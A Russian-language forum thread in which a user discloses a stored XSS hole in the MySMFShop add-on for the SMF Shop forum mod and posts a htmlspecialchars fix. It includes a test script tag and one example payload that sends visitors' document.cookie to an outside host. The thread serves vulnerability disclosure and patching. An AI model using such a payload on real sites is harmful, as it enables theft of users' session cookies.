myShop позволяет сделать с форумом что угодно!

Автор Jerry, 26 ноября 2008, 20:26:37

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Jerry

Я увидел, что мод SMF Shop не фильтрует содержимое названия и описания товаров.
Это даже хорошо: можно делать форматированные разноцветные названия и описания.
Но для SMF Shop существует дополнение MySMFShop (ссылку я нашел в теме мода на это форуме), позволяющий пользователям закачивать свои файлы в магазин.
И только я попробовал ввести "<script>alert(1);</script>" в описание, увидел то, что можно ожидать...

Дополнение возможности закачки не фильтрует ввод пользователей и позволяет легко украсть cookie пользователей XSS атакой или сделать что угодно еще!

Надобности фильтровать такой ввод кажется столь очевидным, что, кажется, никто и не проверял такие вещи!
Внимание владельцам дополнения! Обязательно добавьте в myshop.php фильтрацию наподобие той, что в Post.php (htmlspecialchars и т.д.)!!!
alert(1); мог быть open('http://mysite123.ru/nnn.php?'+document.cookie);... buck

Yworld_garry

Сказали А, говорите В.
Если вы решили эту проблему, поделитесь с народом, если не жалко.

Jerry

До места вставки строки в БД сделайте
htmlspecialchars(stripslashes($_POST['itemname']); htmlspecialchars(stripslashes($_POST['itemdesc']);

Мод вроде такой "официальный" (есть на сайте smf org, у автора мода форум на своем домене, код мода написан со сдвигом и грамотными комментариями), а такой баг...
А можете вообще добавить die('...'); в начало.

supmener

А сейчас как с этим дела обстоят? Все исправили или по прежнему существует уезвимость?

Yworld_garry


supmener


Yworld_garry

Цитата: supmener от 13 марта 2010, 22:33:18
Решение писалось полтора года назад
От этого оно не стало хуже, мод не менялся с тех пор, если он вообще доступен. wallbash
Остался у коллекционеров. :)

supmener